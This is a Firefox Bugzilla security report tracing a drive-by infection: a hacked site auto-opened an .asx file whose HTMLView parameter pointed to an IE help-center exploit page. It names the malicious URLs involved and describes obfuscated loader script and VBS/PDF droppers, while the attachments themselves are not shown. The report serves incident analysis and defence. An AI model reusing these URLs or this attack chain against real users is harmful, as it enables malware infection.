In ff a site silently opens an asx files and if MediaPlayer (default) opens it, a exploit in IE or other MS components allow code execution

NEW
Unassigned

Status

()

Firefox
Security
--
critical
8 years ago
6 years ago

People

(Reporter: Max Vlasov, Unassigned)

Tracking

(Blocks: 1 bug, {sec-vector})

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:vector-critical wmp/ie/hcp], URL)

Attachments

(3 attachments)

(Reporter)

Description

8 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10
Build Identifier: probably 3.5.14 (Because of the exploit the machine is no long working, ver. of the browser )

The following steps in FireFox led to infection of the computer(I tracked them with my backup and sqlite database ff uses)
- I just visited the site http://onlyumpc.com/news/hit-those-hidden-butons-umpc-scrollbar-utility. The contacts page is blank on the site, no other info available except that it has registered with godaddy.com hoster
- It has a automotatic file activation (http://flywintech.com/px/tmp/u.asx) that opened a Windows Media Player on my XP machine and silently installed badware. When his happens I did not notice anything special, just closed the media player. Only later my inquiry showed what happened

My brief research showed me that potential flaw in HTMLView field of the asf file can lead to IE code execution that was revealed by Petko Petkov 3 years ago ( http://www.gnucitizen.org/blog/backdooring-windows-media-files/ )
Also metasploit released a working code about a month ago ( https://www.metasploit.com/redmine/projects/framework/repository/changes/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb ) that has all the properties I saw including a "smallest gif" 

Reproducible: Always

Steps to Reproduce:
1.visited the site http://onlyumpc.com/news/hit-those-hidden-butons-umpc-scrollbar-utility (due to my activity they might hide the exploit), 
2.Automatically http://flywintech.com/px/tmp/u.asx is activated. If this did not happen, just download the file, it still available, it has HTMLView field pointing to http://flywintech.com/px/tmp/hcp.html, that contains html/javascript mixed code. 
3.
Actual Results:  
Computer infected with windows binary code (in my case a service is installed)

Expected Results:  
No arbitrary code execution

I hope that due to the danger of this activity, automatic asf file opening should be disabled by default.

Comment 1

8 years ago
What version of Windows Media Player and IE were on your computer?  I'm curious whether out-of-date components were involved.

If you use a new Firefox profile, does Firefox prompt before opening WMP?  Firefox is supposed to prompt unless you check "don't ask me again" or "always this action for this question" for a given file type or external protocol.
Blocks: 512788
Group: core-security
(Reporter)

Comment 2

8 years ago
Created attachment 458582 [details]
u.asx as it appeared in the firefox disk cache (including http headers) and hcp.html downloaded 2010.07.20

----- u.asx
This entry was extracted from the firefox cache backup'ed from the machine infected. According my inquire the http headers shows the exact moment the machine was infected

----- hcp.html
this entry was downloaded using 3d party tool (javascript unaware) 2010.07.20
in u.asx it referenced as 
  <PARAM name="HTMLView" value="http://flywintech.com/px/tmp/hcp.html"/>

Since this file possibly interpreted by MediaPlayer/IE engine, I could not find it in the firefox cache so just downloaded it 2010.07.20 with my http downloading tool that is unaware of javascript so safe
(Reporter)

Comment 3

8 years ago
I managed to restore the machine this was happened on. So additional version information

FireFox: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 (.NET CLR 3.5.30729)

MediaPlayer: possibly 9, I temporary disabled the player, the file that still resides in the folder (wmplayer.exe) reports 9.00.00.4503. I didn't care for MediaPlayer since I started using 3d party media-players that can possibly the case for a general user. At least default install Windows XP SP2 -> SP3 -> security updates will not change the default version of the player, just would apply some previously known security updates. 

Windows:
XP SP3, security sensitive updates included, I always manually confirm them, if something was related to MediaPlayer, I didn't bypass it. 

Firefox didn't ask for anything, I remember it since I'm always very sensitive about such things, smallest doubt - I refuse. Moreover, when I did research on another machine using my backup data (Windows 7), this page opened this file (u.asx) also silently, but I can not confirm this exploit since Winamp was installed there and it only showed accessing some stream. The firefox on that machine is up to date 3.6.? and I never confirmed any default "don't ask" for asx files just because I never use them. 

I also attached the files involved (u.asx and hcp.html). They were zipped in order to be safe for others).
(In reply to comment #1)
> If you use a new Firefox profile, does Firefox prompt before opening WMP? 
> Firefox is supposed to prompt unless you check "don't ask me again" or "always
> this action for this question" for a given file type or external protocol.

WMP installs a plugin which is loaded by Content-type -- no prompt. The prompt only applies to external schemes or when there's an external helper app. We could maybe blocklist the plugin (even though WMP doesn't actually suffer from the bug) but then the content-type will trigger an attempt to launch WMP as a helper app at which point many users will have checked the "do this every time" box.

How many other apps out there call IE explicitly rather than the default browser? As long as there is one attackers can always create innocuous-looking content that users may open up, creating a chain from content in Firefox to content in IE with more or fewer required clicks from users. The real problem here is the unfixed HCP windows bug.

The onlyumpc site was probably hacked, the first line of http://onlyumpc.com/wp-content/themes/onlyumpc-v2/js/k2functions.js contains obfuscated script unrelated to the rest of the file that turns into a <script> tag of /data/mootools.js on one of 124 hosts randomly selected (31 subdomains times four domains). SafeBrowsing blocks one of the domains completely (gaindirectory.org), and many other hosts return error pages, but some are still active. Currently I can reach obfuscated attack code at http://lime.ideacoreportal.com/data/mootools.js
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:vector-critical wmp/ie/hcp]
Created attachment 458956 [details]
one variant of mootools.js

Here's an example of what I got from lime.ideacoreportal.com/data/mootools.js -- seemed encoded differently each time I loaded it but structurally the same so probably just obfuscation differences. Haven't decoded it further yet.
(Reporter)

Comment 6

8 years ago
I confirm the plugin Daniel mentioned
listed as 

== Windows Media Player Plug-in Dynamic Link Library 3.0.2.629
== npdsplay.dll

on the previously infected computer
(Reporter)

Comment 7

8 years ago
I don't know whether it will help or not, but while trying figure the things out with onlyumpc.com the next day (17.07.2010) on another computer, a new item from flywintech appeared in the ff cache (http://flywintech.com/px/index.php), currenly it seems it is not available on the site (I have a copy from that day). 

It was detected as HTML:Downloader-S on the virustotal by 3 AV software, and Avast listed it as added 14.7.2010
The file starts with <body><applet code='dev.s.AdgredY' archive='tmp/des.jar'
Possibly some automatically downloaded html intended directly on IE users and having no effect in ff
(Reporter)

Comment 8

8 years ago
I have some thoughts about how it could be fixed. 

Confirmations are a compromise that we at least have currently. For example the shortest unbreakable chain is exe activation. There will be a confirmation box and if no AV installed, the user will be infected. 

The question is: is it technically possible to develop and silently install (when ff is not running) a plugin that will bypass exe confirmation? If it's not possible ok.. vbs activation? The list of dangerous file formats isn'tshort. So maybe a blacklist should exist, types from it no plug-in can override for auto-activation. And from version to version, if a vulnerability found for a new type, it can be extended with it. Even if we ended up with a bad user experience asking a confirmation for every possible file format so far, maybe a next step would be to introduce a setting to disable it for those who know what they're doing.

Comment 9

8 years ago
plugins can be dropped into firefox folders at any time w/o any confirmation from firefox.

user state is owned by the user, so if a bad application wants to update the user's firefox plugin cache while firefox isn't running so that firefox thinks it already approved a given plugin, that application running as that user can do so.

the general assumption is that plugins are installed by users for themselves and asking users to confirm something which they presumably intentionally did will just cause them to:
1. get annoyed
2. blindly click a confirm button
3. ignore the message in the future
(Reporter)

Comment 10

8 years ago
It's interesting that there's no such file as npdsplay.dll in any of ff subfolders

Searching led to the following (CMIIW):
- According to http://kb.mozillazine.org/Windows_Media_Player the plug-in installed through plug-in scanning in external folders. I was not aware of such thing.  
- This plug-in existed for ages (actually since Netscape time), according to http://technet.microsoft.com/en-us/library/bb676136.aspx 

"As Netscape Navigator cannot communicate directly with Microsoft ActiveX controls, Microsoft Windows Media Player includes a plug-in (Npdsplay.dll) to allow users of Netscape Navigator to watch ASF content.". 

Earliest mentioning on the microsoft.com: http://support.microsoft.com/kb/243505
Contents of the Mplayer2.cab (IE 4.01 Service Pack 2)...
... Npdsplay dll       347,648  06-25-98  8:55A Npdsplay.dll

Just wondering can this system of external scanning be a potential security threat? I am personally almost ready to disable the external scanning completely in my ff.

Comment 11

8 years ago
security is generally defined as keeping bad things out of a closed system.

once bad stuff is in your closed system, it's too late.

the ability for someone to run code which installs a plugin on your system means they can first and foremost: RUN CODE ON YOUR SYSTEM.

IOW: "No".

Comment 12

8 years ago
Using a combination of technical and social methods, we could prevent honest software vendors from silently installing stuff into Firefox.  See bug 565565 comment 1.

Whether it's worth the ux-interruption, or would actually improve security in cases like this one, is another question.
(Reporter)

Comment 13

8 years ago
Jess, I agree, there's something we can do.
Also, as for new information, I got one.
- On a second computer I mentioned i didn't find any MediaPlayer plugin, but I have a saved profile a cache profile that triggers asx opening. I repeated it dozen of times.
- With this working profile I tried to disable different plug-ins and restart, the plugin that triggers asx opening is Adobe Reader, nppdf32.dll, file version 9.1.0.2009022700, MD5: 28D2C5CE5944E1B027CF5C8004CF89A1. So it looks like the path is a little bit longer.
- I switched LiveHeaders extension (allows to monitor HTTP headers and response) and once I managed to catch the full F5 downloading leading to asx opening. I'll attach it and also I'll attach a pdf mentioned there and vbs mentioned in the pdf (both downloaded today using the links appeared in the file). The strange thing is that the order of files in LiveHeaders is u.asx -> pdf, so if pdf triggers something, u.asx is already loaded (if LiveHeaders works sequentially)

I looked at the version of Adobe Reader as a program here, it's 9.2.0, I know it's not the latest, and I didn't yet upgraded it now in order to keep the current state for testing purposes. Still can not figure out an exact trigger code allowing this chain. Any suggestions?

Also wanted to compare LiveHeaders results in case of Adobe Reader disabled, but unfortunately F5 for this infected page not always works.
(Reporter)

Comment 14

8 years ago
Created attachment 459530 [details]
Live Headers (HTTP Requests/Response) of a full reload operation

LiveHeaders - the contents of the Live Headers extension window after successfull reload (F5) operation leading to automatic asx opening

pdfopen.pdf.txt - the contents of  http://flywintech.com/px/tmp/pdfopen.pdf file (mentioned in headers)

m.vbs.txt - the contents of  m.vbs file mentioned in http://flywintech.com/px/tmp/pdfopen.pdf 

vbs and pdf files use StrReverse extensively to hide the names of Windows object used (Scripting.FileSystemObject, WScript.Shell, MSXML2.XMLHTML, ADODB.Stream)
(Reporter)

Comment 15

8 years ago
Upgrading to the latest version (nppdf32.dll: 9.3.3.177) stopped automatic asx downloading at least for the saved profile I mentioned. It seems that this was fully Adobe Reader related. 

But some things still puzzle me. It looks like the u.asx downloading (that was actually listed in the download list) was a kind of mozilla downloading but on behave of some scripting request from a plugin. Also the full path of actions is still hidden behind a complex logic.

Another thing. As long as "You should upgrade your flash..." warning was at least once used for Your Browser Updated page, is it possible to do the same for Adobe Reader plugin from time to time?
Keywords: sec-other
Keywords: sec-vector
Keywords: sec-other
You need to log in before you can comment on or make changes to this bug.